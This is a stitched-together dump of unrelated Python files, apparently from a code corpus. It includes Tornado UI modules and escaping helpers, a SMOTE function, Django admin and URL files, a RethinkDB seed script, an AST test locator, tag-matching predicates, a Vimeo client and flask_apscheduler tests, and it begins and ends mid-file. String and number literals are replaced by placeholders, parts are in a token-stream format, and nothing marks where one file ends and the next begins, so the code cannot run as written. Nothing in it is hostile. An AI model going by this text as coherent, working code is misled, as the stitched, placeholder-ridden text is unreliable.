SECONDS_PER_DAY , <EOL> arg1 = <NUM_LIT:1> , <EOL> arg2 = '<STR_LIT:foo>' ) <EOL> def testShortDomainRedirectHandler ( self ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' % ( options . options . short_domain , self . get_http_port ( ) ) <EOL> response = self . _RunAsync ( self . http_client . fetch , url , method = '<STR_LIT:GET>' , follow_redirects = False ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> self . assertEqual ( response . headers [ '<STR_LIT:location>' ] , '<STR_LIT>' ) </s>
"""Tornado UIModules used to assemble viewfinder web pages.

Each module renders a template fragment and declares the JS/CSS asset
bundles (resolved through ResourcesManager) that the page must include.
"""
import posixpath
from tornado import options
from tornado.web import UIModule
from viewfinder.backend.base import environ
from viewfinder.backend.resources.resources_mgr import ResourcesManager
from viewfinder.backend.www.basic_auth import BasicAuthHandler

__author__ = '<STR_LIT>'


class Header(UIModule):
  """Page header; resolves the current user's display name for the template."""

  def render(self, **settings):
    # BasicAuthHandler exposes the user via get_current_user(); other
    # handlers use the viewfinder-specific _GetCurrentUserName() hook.
    if isinstance(self.handler, BasicAuthHandler):
      user = self.handler.get_current_user()
      if user is not None:
        name = user
      else:
        name = None
    else:
      name = self.handler._GetCurrentUserName()
    return self.render_string('<STR_LIT>', name=name, **settings)

  def javascript_files(self):
    jsfiles = ResourcesManager.Instance().GetAssetPaths('<STR_LIT>')
    # Extra (presumably debug-only) script on development boxes.
    if environ.ServerEnvironment.IsDevBox():
      jsfiles.append('<STR_LIT>')
    return jsfiles

  def css_files(self):
    return ResourcesManager.Instance().GetAssetPaths('<STR_LIT>')


class Base(UIModule):
  """Base page scaffolding rendered from a template with caller settings."""

  def render(self, **settings):
    return self.render_string('<STR_LIT>', **settings)

  def javascript_files(self):
    jsfiles = ResourcesManager.Instance().GetAssetPaths('<STR_LIT>')
    if environ.ServerEnvironment.IsDevBox():
      jsfiles.append('<STR_LIT>')
    return jsfiles

  def css_files(self):
    return ResourcesManager.Instance().GetAssetPaths('<STR_LIT>')


class Square(UIModule):
  """Renders a fixed literal fragment; only contributes asset bundles."""

  def render(self, **settings):
    return '<STR_LIT>'

  def javascript_files(self):
    return ResourcesManager.Instance().GetAssetPaths('<STR_LIT>')

  def css_files(self):
    return ResourcesManager.Instance().GetAssetPaths('<STR_LIT>')


class View(UIModule):
  """Photo/content view page module."""

  def render(self, **settings):
    return self.render_string('<STR_LIT>', **settings)

  def javascript_files(self):
    return ResourcesManager.Instance().GetAssetPaths('<STR_LIT>')

  def css_files(self):
    return ResourcesManager.Instance().GetAssetPaths('<STR_LIT>')


class Admin(UIModule):
  """Admin page module; exposes the server's HG revision to the template."""

  def render(self, **settings):
    hg_revision = environ.ServerEnvironment.GetHGRevision()
    return self.render_string('<STR_LIT>', hg_revision=hg_revision, **settings)

  def javascript_files(self):
    return ResourcesManager.Instance().GetAssetPaths('<STR_LIT>')

  def css_files(self):
    return ResourcesManager.Instance().GetAssetPaths('<STR_LIT>')


class Script(UIModule):
  """Collects per-page JS files, de-duplicated but in first-seen order."""

  JS_SUBDIR = '<STR_LIT>'

  def __init__(self, handler):
    super(Script, self).__init__(handler)
    # Set for O(1) de-duplication; list preserves inclusion order.
    self._js_file_set = set()
    self._js_files = []

  def render(self, file):
    file = posixpath.join(self.JS_SUBDIR, file)
    if not file in self._js_file_set:
      self._js_file_set.add(file)
      self._js_files.append(file)
    # Emits no inline markup; the files are injected via javascript_files().
    return "<STR_LIT>"

  def javascript_files(self):
    return self._js_files


class Css(UIModule):
  """Collects per-page CSS files, de-duplicated but in first-seen order."""

  CSS_SUBDIR = '<STR_LIT>'

  def __init__(self, handler):
    super(Css, self).__init__(handler)
    self._css_file_set = set()
    self._css_files = []

  def render(self, file):
    file = posixpath.join(self.CSS_SUBDIR, file)
    if not file in self._css_file_set:
      self._css_file_set.add(file)
      self._css_files.append(file)
    return "<STR_LIT>"

  def css_files(self):
    return self._css_files


class Auth(UIModule):
  """Authentication (login/signup) page module."""

  def render(self, prospective=False, signup_ident=None, **settings):
    return self.render_string('<STR_LIT>', prospective=prospective,
                              signup_ident=signup_ident, **settings)

  def javascript_files(self):
    """Concatenates two asset bundles for the auth page."""
    resourceManager = ResourcesManager.Instance()
    return resourceManager.GetAssetPaths('<STR_LIT>') + resourceManager.GetAssetPaths('<STR_LIT>')

  def css_files(self):
    return ResourcesManager.Instance().GetAssetPaths('<STR_LIT>')
"""Escaping/unescaping and byte/unicode conversion utilities
(HTML, JSON, URLs), written to run on both Python 2 and Python 3.
"""
from __future__ import absolute_import, division, print_function, with_statement

import re
import sys

from tornado.util import bytes_type, unicode_type, basestring_type, u

# py3 moved parse_qs into urllib.parse; fall back to the py2 module name.
try:
    from urllib.parse import parse_qs as _parse_qs
except ImportError:
    from urlparse import parse_qs as _parse_qs
# htmlentitydefs (py2) became html.entities (py3).
try:
    import htmlentitydefs
except ImportError:
    import html.entities as htmlentitydefs
# quote/unquote helpers live in urllib.parse on py3, urllib on py2.
try:
    import urllib.parse as urllib_parse
except ImportError:
    import urllib as urllib_parse
import json
# unichr does not exist on py3; chr covers all code points there.
try:
    unichr
except NameError:
    unichr = chr

# Characters to escape in XHTML output and their replacement entities
# (exact characters hidden by the literal placeholders).
_XHTML_ESCAPE_RE = re.compile('<STR_LIT>')
_XHTML_ESCAPE_DICT = {'<STR_LIT:&>': '<STR_LIT>', '<STR_LIT:<>': '<STR_LIT>', '<STR_LIT:>>': '<STR_LIT>', '<STR_LIT:">': '<STR_LIT>',
                      '<STR_LIT>': '<STR_LIT>'}


def xhtml_escape(value):
    """Replace each character matched by _XHTML_ESCAPE_RE with its entity
    from _XHTML_ESCAPE_DICT; the input is coerced via to_basestring()."""
    return _XHTML_ESCAPE_RE.sub(lambda match: _XHTML_ESCAPE_DICT[match.group(0)],
                                to_basestring(value))


def xhtml_unescape(value):
    """Expand HTML entities in *value* via the _convert_entity callback."""
    return re.sub(r"<STR_LIT>", _convert_entity, _unicode(value))


def json_encode(value):
    """JSON-encode *value*; the trailing .replace() rewrites a substring that
    is unsafe to embed directly (hidden by the literal placeholders)."""
    return json.dumps(value).replace("<STR_LIT>", "<STR_LIT>")


def json_decode(value):
    """Parse JSON from a byte or unicode string into Python objects."""
    return json.loads(to_basestring(value))


def squeeze(value):
    """Collapse runs matched by the (hidden) pattern into a single space and
    strip leading/trailing whitespace."""
    return re.sub(r"<STR_LIT>", "<STR_LIT:U+0020>", value).strip()


def url_escape(value, plus=True):
    """Percent-encode *value*; plus=True uses quote_plus semantics."""
    quote = urllib_parse.quote_plus if plus else urllib_parse.quote
    return quote(utf8(value))


# url_unescape / parse_qs_bytes differ between py2 and py3 because the
# bytes/str split changed between the two.
if sys.version_info[0] < 3:
    def url_unescape(value, encoding='<STR_LIT:utf-8>', plus=True):
        """Decode a percent-encoded string: bytes when encoding is None,
        otherwise a unicode string decoded with *encoding*."""
        unquote = (urllib_parse.unquote_plus if plus else urllib_parse.unquote)
        if encoding is None:
            return unquote(utf8(value))
        else:
            return unicode_type(unquote(utf8(value)), encoding)

    parse_qs_bytes = _parse_qs
else:
    def url_unescape(value, encoding='<STR_LIT:utf-8>', plus=True):
        """py3 variant: uses unquote_to_bytes when encoding is None."""
        if encoding is None:
            if plus:
                # unquote_to_bytes does not do plus-to-space itself.
                value = to_basestring(value).replace('<STR_LIT:+>', '<STR_LIT:U+0020>')
            return urllib_parse.unquote_to_bytes(value)
        else:
            unquote = (urllib_parse.unquote_plus if plus
                       else urllib_parse.unquote)
            return unquote(to_basestring(value), encoding=encoding)

    def parse_qs_bytes(qs, keep_blank_values=False, strict_parsing=False):
        """Like parse_qs, but re-encodes the values to bytes to mirror the
        Python 2 return shape."""
        result = _parse_qs(qs, keep_blank_values, strict_parsing,
                           encoding='<STR_LIT>', errors='<STR_LIT:strict>')
        encoded = {}
        for k, v in result.items():
            encoded[k] = [i.encode('<STR_LIT>') for i in v]
        return encoded


_UTF8_TYPES = (bytes_type, type(None))


def utf8(value):
    """Return *value* as UTF-8 encoded bytes; bytes and None pass through."""
    if isinstance(value, _UTF8_TYPES):
        return value
    assert isinstance(value, unicode_type), "<STR_LIT>" % type(value)
    return value.encode("<STR_LIT:utf-8>")


_TO_UNICODE_TYPES = (unicode_type, type(None))


def to_unicode(value):
    """Return *value* as a unicode string; unicode and None pass through."""
    if isinstance(value, _TO_UNICODE_TYPES):
        return value
    assert isinstance(value, bytes_type), "<STR_LIT>" % type(value)
    return value.decode("<STR_LIT:utf-8>")


# Historical alias for to_unicode.
_unicode = to_unicode

# native_str converts to the interpreter's natural str type.
if str is unicode_type:
    native_str = to_unicode
else:
    native_str = utf8

_BASESTRING_TYPES = (basestring_type, type(None))


def to_basestring(value):
    """Like to_unicode, but accepts any basestring subtype on Python 2."""
    if isinstance(value, _BASESTRING_TYPES):
        return value
    assert isinstance(value, bytes_type), "<STR_LIT>" % type(value)
    return value.decode("<STR_LIT:utf-8>")


def recursive_unicode(obj):
    """Walk dicts/lists/tuples, decoding every bytes leaf to unicode."""
    if isinstance(obj, dict):
        return dict((recursive_unicode(k), recursive_unicode(v))
                    for (k, v) in obj.items())
    elif isinstance(obj, list):
        return list(recursive_unicode(i) for i in obj)
    elif isinstance(obj, tuple):
        return tuple(recursive_unicode(i) for i in obj)
    elif isinstance(obj, bytes_type):
        return to_unicode(obj)
    else:
        return obj


# Regex matching URL-like substrings (pattern hidden by the placeholder).
_URL_RE = re.compile(to_unicode(r"""<STR_LIT>"""))


def linkify(text, shorten=False, extra_params="<STR_LIT>",
            require_protocol=False, permitted_protocols=["<STR_LIT:http>", "<STR_LIT>"]):
    """Escape *text* and wrap URL-like substrings in anchor tags.

    NOTE(review): permitted_protocols is a mutable default argument; it is
    only read here, so this is safe as long as callers never mutate it.
    """
    if extra_params and not callable(extra_params):
        extra_params = "<STR_LIT:U+0020>" + extra_params.strip()

    def make_link(m):
        url = m.group(1)
        proto = m.group(2)
        # Leave text unlinked when the protocol policy is not met.
        if require_protocol and not proto:
            return url
        if proto and proto not in permitted_protocols:
            return url
        href = m.group(1)
        if not proto:
            href = "<STR_LIT>" + href  # prefix a default protocol
        if callable(extra_params):
            params = "<STR_LIT:U+0020>" + extra_params(href).strip()
        else:
            params = extra_params
        # Clip overly long display text while keeping the full href intact.
        max_len = 30
        if shorten and len(url) > max_len:
            before_clip = url
            if proto:
                # proto + separator + m.group(3) (separator group, hidden).
                proto_len = len(proto) + 1 + len(m.group(3) or "<STR_LIT>")
            else:
                proto_len = 0
            parts = url[proto_len:].split("<STR_LIT:/>")
            if len(parts) > 1:
                # Keep host plus a short prefix of the first path segment.
                url = (url[:proto_len] + parts[0] + "<STR_LIT:/>" +
                       parts[1][:8].split('<STR_LIT:?>')[0].split('<STR_LIT:.>')[0])
            if len(url) > max_len * <NUM_LIT>:  # factor hidden by placeholder
                url = url[:max_len]
            if url != before_clip:
                # Do not end the clipped text inside an HTML entity.
                amp = url.rfind('<STR_LIT:&>')
                if amp > max_len - 5:
                    url = url[:amp]
                url += "<STR_LIT>"
                # Clipping must actually save space; otherwise undo it.
                if len(url) >= len(before_clip):
                    url = before_clip
                else:
                    params += '<STR_LIT>' % href
        return u('<STR_LIT>') % (href, params, url)

    # Escape first so that only the anchors we generate contain markup.
    text = _unicode(xhtml_escape(text))
    return _URL_RE.sub(make_link, text)


def _convert_entity(m):
    """re.sub callback translating one HTML entity match to its character;
    unknown entities are re-emitted via the fallback format string."""
    if m.group(1) == "<STR_LIT:#>":
        try:
            return unichr(int(m.group(2)))
        except ValueError:
            return "<STR_LIT>" % m.group(2)
    try:
        return _HTML_UNICODE_MAP[m.group(2)]
    except KeyError:
        return "<STR_LIT>" % m.group(2)


def _build_unicode_map():
    """Build the entity-name -> character map from htmlentitydefs."""
    unicode_map = {}
    for name, value in htmlentitydefs.name2codepoint.items():
        unicode_map[name] = unichr(value)
    return unicode_map


_HTML_UNICODE_MAP = _build_unicode_map()
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import numpy as np <EOL> from sklearn . neighbors import NearestNeighbors <EOL> def smote ( T , N = <NUM_LIT:100> , k = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> if T . shape [ <NUM_LIT:0> ] <= k + <NUM_LIT:1> : <EOL> idx = np . random . choice ( T . shape [ <NUM_LIT:0> ] , size = ( k + <NUM_LIT:1> , ) ) <EOL> T = T [ idx , : ] <EOL> if N < <NUM_LIT:100> : <EOL> sz = int ( T . shape [ <NUM_LIT:0> ] * ( N / <NUM_LIT:100> ) ) <EOL> idx = np . random . choice ( T . shape [ <NUM_LIT:0> ] , size = ( sz , ) , replace = False ) <EOL> T = T [ idx , : ] <EOL> N = <NUM_LIT:100> <EOL> if N % <NUM_LIT:100> != <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> N = int ( N / <NUM_LIT:100> ) <EOL> n_minority_samples , n_features = T . shape <EOL> n_synthetic_samples = N * n_minority_samples <EOL> synthetic = np . zeros ( ( n_synthetic_samples , n_features ) ) <EOL> knn = NearestNeighbors ( n_neighbors = k ) <EOL> knn . fit ( T ) <EOL> count = <NUM_LIT:0> <EOL> for i in range ( n_minority_samples ) : <EOL> neighbors_idx = knn . kneighbors ( T [ i , : ] , n_neighbors = k + <NUM_LIT:1> , return_distance = False ) [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] <EOL> nn_idx = np . random . choice ( neighbors_idx , size = ( N , ) ) <EOL> chosen_neighbors = T [ nn_idx , : ] <EOL> diff = chosen_neighbors - T [ i , : ] <EOL> gap = np . random . uniform ( low = <NUM_LIT:0.0> , high = <NUM_LIT:1.0> , size = N ) [ : , np . newaxis ] <EOL> synthetic [ count : count + N , : ] = T [ i , : ] + ( gap * diff ) <EOL> count += N <EOL> return synthetic </s>
from django.contrib import admin
from datatrans.models import KeyValue


class KeyValueAdmin(admin.ModelAdmin):
    """Django admin configuration for datatrans KeyValue entries
    (field names hidden by the literal placeholders)."""
    list_display = ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                    '<STR_LIT:value>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
    ordering = ('<STR_LIT>', '<STR_LIT>')
    search_fields = ('<STR_LIT>', '<STR_LIT>', '<STR_LIT:value>',)
    list_filter = ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>')


admin.site.register(KeyValue, KeyValueAdmin)
# URLconf wiring the admin site and the datatrans URLs into one project
# (uses the pre-Django-1.4 `patterns(...)` style from conf.urls.defaults).
from django.conf.urls.defaults import *
from datatrans import urls
from django.contrib import admin

# Populate admin.site with all registered ModelAdmins before URL resolution.
admin.autodiscover()

urlpatterns = patterns('<STR_LIT>',
    (r'<STR_LIT>', include(admin.site.urls)),
    (r'<STR_LIT>', include(urls)),
)
import codecs
import os
import rethinkdb as r
import db.init_db
import db.plugins
import db.util
import tags


def main():
    """Seed the development RethinkDB database with example plugin data."""
    conn = r.connect()
    # Create the database if it does not exist; an RqlRuntimeError here
    # means it is already present and is deliberately ignored.
    try:
        r.db_create('<STR_LIT>').run(conn)
    except r.RqlRuntimeError:
        pass
    conn.use('<STR_LIT>')
    db.init_db.ensure_tables_and_indices()

    # NOTE(review): the corpus encoding drops indentation, so the nesting of
    # everything below inside main() is inferred from the control flow.
    def read_file(filename):
        """Read a UTF-8 text file located next to this script."""
        full_path = os.path.join(os.path.dirname(__file__), filename)
        with codecs.open(full_path, encoding='<STR_LIT:utf-8>', mode='<STR_LIT:r>') as f:
            return f.read()

    ctrlp_readme = read_file('<STR_LIT>')
    youcompleteme_readme = read_file('<STR_LIT>')
    # Upsert two example plugin documents (conflict='replace'-style).
    db.plugins.insert([
        {
            '<STR_LIT:id>': '<STR_LIT>',
            '<STR_LIT:name>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': ctrlp_readme,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': ['<STR_LIT>', '<STR_LIT:file>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'],
        },
        {
            '<STR_LIT:id>': '<STR_LIT>',
            '<STR_LIT:name>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': None,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': youcompleteme_readme,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': ['<STR_LIT>', '<STR_LIT>', '<STR_LIT:C>'],
        },
    ], conflict='<STR_LIT:replace>')
    # NOTE(review): this query object is built but never executed --
    # .run(conn) is not called. Confirm whether that is intentional.
    r.table('<STR_LIT>').insert([{
        '<STR_LIT:id>': '<STR_LIT>',
        '<STR_LIT:count>': 1,
    }])
    tags.aggregate_tags()


if __name__ == '<STR_LIT:__main__>':
    main()
"""Locate the test case / test function that encloses a given line of a
Python source file, by walking the file's AST."""
import ast
import _ast
import re
import os

# Regex deciding whether a class/function name looks like a test; the
# original pattern (formatted with os.sep) is hidden by the placeholder.
testMatch = re.compile(r'<STR_LIT>' % os.sep)


def __get_line(node):
    """Return *node*'s line-number attribute, or -1 when it has none."""
    return getattr(node, '<STR_LIT>', -1)


def __get_best_matching_child(node, lineno):
    """Return the child of *node* starting closest to, but not after, *lineno*.

    An exact line match wins immediately; otherwise the latest child that
    still starts at or before *lineno* is kept. Returns None for childless
    nodes.
    """
    childs = getattr(node, '<STR_LIT:body>', [])
    result = next(iter(childs), None)
    result_lineno = __get_line(result)
    for child in childs[1:]:
        child_lineno = __get_line(child)
        if child_lineno > lineno:
            break
        elif child_lineno == lineno:
            return child
        elif child_lineno > result_lineno:
            result = child
            result_lineno = child_lineno
    return result


def __get_best_matching_chain(node, lineno):
    """Return the chain of nested AST nodes leading down to *lineno*,
    starting from *node* (typically the Module)."""
    result = []
    while node and __get_line(node) <= lineno:
        result.append(node)
        node = __get_best_matching_child(node, lineno)
    return result


def __is_test_case(node):
    """True when *node* is a class that looks like a test case: it either
    derives from a base with the expected attribute name or its own name
    matches testMatch."""
    if type(node) is _ast.ClassDef:
        bases = [base.attr for base in node.bases if hasattr(base, '<STR_LIT>')]
        if '<STR_LIT>' in bases:
            return True
        if testMatch.match(node.name):
            return True
    return False


def __is_test_function(node):
    """True when *node* is a function definition whose name matches testMatch."""
    # Fixed: return an explicit bool instead of True-or-None.
    if type(node) is _ast.FunctionDef and testMatch.match(node.name):
        return True
    return False


def get_ast_branch_at(file_, position):
    """Parse *file_* and return the AST chain enclosing line position[0]."""
    # Fixed: use a context manager so the file handle is closed promptly
    # (the original leaked the handle returned by open()).
    with open(file_) as source:
        module = ast.parse(source.read())
    return __get_best_matching_chain(module, position[0])


def get_test_case_at(file_, position):
    """Return the dotted name of the test case enclosing *position*,
    or the empty string when none is found."""
    branch = get_ast_branch_at(file_, position)
    chain = branch[1:]  # drop the Module node
    # Scan from the innermost node outwards, popping non-matching tails.
    for node in reversed(chain):
        if __is_test_case(node):
            break
        chain.pop()
    return "<STR_LIT:.>".join([node.name for node in chain])


def get_test_function_at(file_, position):
    """Return the dotted name of the test function (or enclosing test case)
    at *position*, or the empty string when none is found."""
    branch = get_ast_branch_at(file_, position)
    chain = branch[1:]  # drop the Module node
    for node in reversed(chain):
        if __is_test_function(node):
            break
        if __is_test_case(node):
            break
        chain.pop()
    return "<STR_LIT:.>".join([node.name for node in chain])
import re

# Predicate functions for matching objects by their tag dictionary
# (stored under the placeholder key '<STR_LIT>'). Each match_* function is
# dispatched by name through match_ast().
#
# Fixed: the Python-2-only iterkeys()/itervalues() calls (removed in
# Python 3) are replaced with keys()/values(), which behave identically
# for these membership/iteration uses on both versions; the module
# already used .items() elsewhere.


def match_tag_equality(_oid, data, key, term):
    """True when tag *key* exists and equals *term* exactly."""
    return data['<STR_LIT>'].get(key) == term


def match_tag_exists(_oid, data, key):
    """True when tag *key* is present, whatever its value."""
    return key in data['<STR_LIT>']


def match_any_tag_value(_oid, data, term):
    """True when any tag value equals *term*."""
    return term in data['<STR_LIT>'].values()


def match_tag_regex(_oid, data, key, term):
    """Match object when tag *key* exists and its value matches regex *term*."""
    return key in data['<STR_LIT>'] and re.search(term, data['<STR_LIT>'][key])


def match_tag_name_regex(_oid, data, key):
    """True when any tag NAME matches regex *key*."""
    regex = re.compile(key)
    return any(regex.search(k) for k in data['<STR_LIT>'].keys())


def match_tag_value_regex(_oid, data, term):
    """True when any tag VALUE matches regex *term*."""
    regex = re.compile(term)
    return any(regex.search(v) for v in data['<STR_LIT>'].values())


def match_id_regex(oid, _data, key):
    """Match object when its id matches regex *key*."""
    return re.search(key, oid)


def match_negate(oid, data, ast):
    return not match_ast(oid, data, ast)


def match_or(oid, data, *asts):
    return any(match_ast(oid, data, ast) for ast in asts)


def match_and(oid, data, *asts):
    return all(match_ast(oid, data, ast) for ast in asts)


def match_ast(oid, data, ast):
    """Evaluate a query AST: ast[0] names one of the match_* functions in
    this module; the remaining elements are its extra arguments."""
    return globals()[ast[0]](oid, data, *ast[1:])


def filter_matching(ast, objects):
    """Return the subset of the {oid: data} mapping whose entries satisfy *ast*."""
    return dict((oid, data) for (oid, data) in objects.items()
                if match_ast(oid, data, ast))
class DummyPrefs:
    """Minimal stand-in for a preferences object.

    Exposes the single class attribute the consumers read: an (initially
    empty) list of graph options shared by all instances.
    """
    graph_options = []
from __future__ import absolute_import
from functools import wraps
import json
import requests
from .auth.client_credentials import ClientCredentialsMixin
from .auth.authorization_code import AuthorizationCodeMixin
from .upload import UploadMixin


class VimeoClient(ClientCredentialsMixin, AuthorizationCodeMixin, UploadMixin):
    """HTTP client for the Vimeo API.

    HTTP verbs (the names in HTTP_METHODS) are not defined as methods;
    __getattr__ fabricates a wrapper around the matching `requests`
    function on demand.
    """
    API_ROOT = "<STR_LIT>"
    HTTP_METHODS = {'<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'}
    ACCEPT_HEADER = "<STR_LIT>"
    USER_AGENT = "<STR_LIT>"

    def __init__(self, token=None, key=None, secret=None, *args, **kwargs):
        """Either a bearer *token* or a (key, secret) app pair is required;
        the trailing assert enforces that."""
        self.token = token  # goes through the property setter below
        self.app_info = (key, secret)
        self._requests_methods = dict()
        assert token is not None or (key is not None and secret is not None)

    @property
    def token(self):
        # NOTE(review): raises AttributeError when no token was set
        # (self._token is None in that case) -- confirm callers expect that.
        return self._token.token

    @token.setter
    def token(self, value):
        # Wrap the raw token so `requests` attaches it as an auth header.
        self._token = _BearerToken(value) if value else None

    def __getattr__(self, name):
        """Build a request wrapper for HTTP verb *name* on the fly.

        Only names in HTTP_METHODS are served; anything else raises
        AttributeError as usual.
        """
        if name not in self.HTTP_METHODS:
            raise AttributeError("<STR_LIT>" % name)
        request_func = getattr(requests, name, None)
        if request_func is None:
            raise AttributeError("<STR_LIT>"
                                 % name)

        @wraps(request_func)
        def caller(url, jsonify=True, **kwargs):
            """Issue the request with API defaults (accept header, user
            agent, timeout, auth) filled in unless the caller overrides."""
            headers = kwargs.get('<STR_LIT>', dict())
            headers['<STR_LIT>'] = self.ACCEPT_HEADER
            headers['<STR_LIT>'] = self.USER_AGENT
            # JSON-encode dict/list payloads unless jsonify is disabled.
            if jsonify and '<STR_LIT:data>' in kwargs and isinstance(kwargs['<STR_LIT:data>'], (dict, list)):
                kwargs['<STR_LIT:data>'] = json.dumps(kwargs['<STR_LIT:data>'])
                headers['<STR_LIT:Content-Type>'] = '<STR_LIT:application/json>'
            # (connect, read) timeout defaults; overridable per call.
            kwargs['<STR_LIT>'] = kwargs.get('<STR_LIT>', (1, 30))
            kwargs['<STR_LIT>'] = kwargs.get('<STR_LIT>', self._token)
            kwargs['<STR_LIT>'] = headers
            # Relative paths are resolved against the API root.
            if not url[:4] == "<STR_LIT:http>":
                url = self.API_ROOT + url
            return request_func(
                url,
                **kwargs)
        return caller


class _BearerToken(requests.auth.AuthBase):
    """requests auth hook that adds the bearer Authorization header."""

    def __init__(self, token):
        self.token = token

    def __call__(self, request):
        request.headers['<STR_LIT>'] = '<STR_LIT>' + self.token
        return request
import json
from flask import Flask
from flask_apscheduler import APScheduler
from unittest import TestCase


class TestViews(TestCase):
    """Exercises the flask_apscheduler REST views through the Flask test
    client. Routes, JSON keys and most non-200 status codes are hidden by
    corpus placeholders ('<STR_LIT>' / <NUM_LIT>)."""

    def setUp(self):
        # Fresh app + scheduler per test; the scheduler's API views are
        # registered when APScheduler wraps the app.
        self.app = Flask(__name__)
        self.app.config['<STR_LIT>'] = True
        self.scheduler = APScheduler(app=self.app)
        self.scheduler.start()
        self.client = self.app.test_client()

    def test_scheduler_info(self):
        response = self.client.get('<STR_LIT>')
        self.assertEqual(response.status_code, 200)
        info = json.loads(response.get_data(as_text=True))
        self.assertIsNotNone(info['<STR_LIT>'])
        self.assertEqual(info['<STR_LIT>'], ['<STR_LIT:*>'])
        self.assertTrue(info['<STR_LIT>'])

    def test_add_job(self):
        job = {
            '<STR_LIT:id>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT:date>',
            '<STR_LIT>': '<STR_LIT>',
        }
        response = self.client.post('<STR_LIT>', data=json.dumps(job))
        self.assertEqual(response.status_code, 200)
        # The created job is echoed back; compare the submitted fields.
        job2 = json.loads(response.get_data(as_text=True))
        self.assertEqual(job.get('<STR_LIT:id>'), job2.get('<STR_LIT:id>'))
        self.assertEqual(job.get('<STR_LIT>'), job2.get('<STR_LIT>'))
        self.assertEqual(job.get('<STR_LIT>'), job2.get('<STR_LIT>'))
        self.assertEqual(job.get('<STR_LIT>'), job2.get('<STR_LIT>'))

    def test_add_conflicted_job(self):
        job = {
            '<STR_LIT:id>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT:date>',
            '<STR_LIT>': '<STR_LIT>',
        }
        response = self.client.post('<STR_LIT>', data=json.dumps(job))
        self.assertEqual(response.status_code, 200)
        # Adding the same job id twice must fail (conflict status code).
        response = self.client.post('<STR_LIT>', data=json.dumps(job))
        self.assertEqual(response.status_code, <NUM_LIT>)

    def test_add_invalid_job(self):
        job = {
            '<STR_LIT:id>': None,
        }
        response = self.client.post('<STR_LIT>', data=json.dumps(job))
        self.assertEqual(response.status_code, <NUM_LIT>)

    def test_delete_job(self):
        self.__add_job()
        response = self.client.delete('<STR_LIT>')
        self.assertEqual(response.status_code, <NUM_LIT>)
        # The job must be gone afterwards.
        response = self.client.get('<STR_LIT>')
        self.assertEqual(response.status_code, <NUM_LIT>)

    def test_delete_job_not_found(self):
        response = self.client.delete('<STR_LIT>')
        self.assertEqual(response.status_code, <NUM_LIT>)

    def test_get_job(self):
        job = self.__add_job()
        response = self.client.get('<STR_LIT>')
        self.assertEqual(response.status_code, 200)
        job2 = json.loads(response.get_data(as_text=True))
        self.assertEqual(job.get('<STR_LIT:id>'), job2.get('<STR_LIT:id>'))
        self.assertEqual(job.get('<STR_LIT>'), job2.get('<STR_LIT>'))
        self.assertEqual(job.get('<STR_LIT>'), job2.get('<STR_LIT>'))
        self.assertEqual(job.get('<STR_LIT>'), job2.get('<STR_LIT>'))

    def test_get_job_not_found(self):
        response = self.client.get('<STR_LIT>')
        self.assertEqual(response.status_code, <NUM_LIT>)

    def test_get_all_jobs(self):
        job = self.__add_job()
        response = self.client.get('<STR_LIT>')
        self.assertEqual(response.status_code, 200)
        jobs = json.loads(response.get_data(as_text=True))
        self.assertEqual(len(jobs), 1)
        job2 = jobs[0]
        self.assertEqual(job.get('<STR_LIT:id>'), job2.get('<STR_LIT:id>'))
        self.assertEqual(job.get('<STR_LIT>'), job2.get('<STR_LIT>'))
        self.assertEqual(job.get('<STR_LIT>'), job2.get('<STR_LIT>'))
        self.assertEqual(job.get('<STR_LIT>'), job2.get('<STR_LIT>'))

    def test_update_job(self):
        job = self.__add_job()
        data_to_update = {
            '<STR_LIT:args>': [1],
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>'
        }
        response = self.client.patch('<STR_LIT>', data=json.dumps(data_to_update))
        self.assertEqual(response.status_code, 200)
        job2 = json.loads(response.get_data(as_text=True))
        # Untouched fields keep their original values...
        self.assertEqual(job.get('<STR_LIT:id>'), job2.get('<STR_LIT:id>'))
        self.assertEqual(job.get('<STR_LIT>'), job2.get('<STR_LIT>'))
        # ...while patched fields reflect the update payload.
        self.assertEqual(data_to_update.get('<STR_LIT:args>'), job2.get('<STR_LIT:args>'))
        self.assertEqual(data_to_update.get('<STR_LIT>'), job2.get('<STR_LIT>'))
        self.assertEqual('<STR_LIT>', job2.get('<STR_LIT>'))
        self.assertEqual('<STR_LIT>', job2.get('<STR_LIT>'))

    def test_update_job_not_found(self):
        data_to_update = {
            '<STR_LIT:args>': [1],
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>'
        }
        response = self.client.patch('<STR_LIT>', data=json.dumps(data_to_update))
        self.assertEqual(response.status_code, <NUM_LIT>)

    def test_update_invalid_job(self):
        self.__add_job()
        data_to_update = {
            '<STR_LIT>': '<STR_LIT>',
        }
        response = self.client.patch('<STR_LIT>', data=json.dumps(data_to_update))
        self.assertEqual(response.status_code, <NUM_LIT>)

    def test_pause_and_resume_job(self):
        self.__add_job()
        # Pausing clears the (placeholder-named) next-run field...
        response = self.client.post('<STR_LIT>')
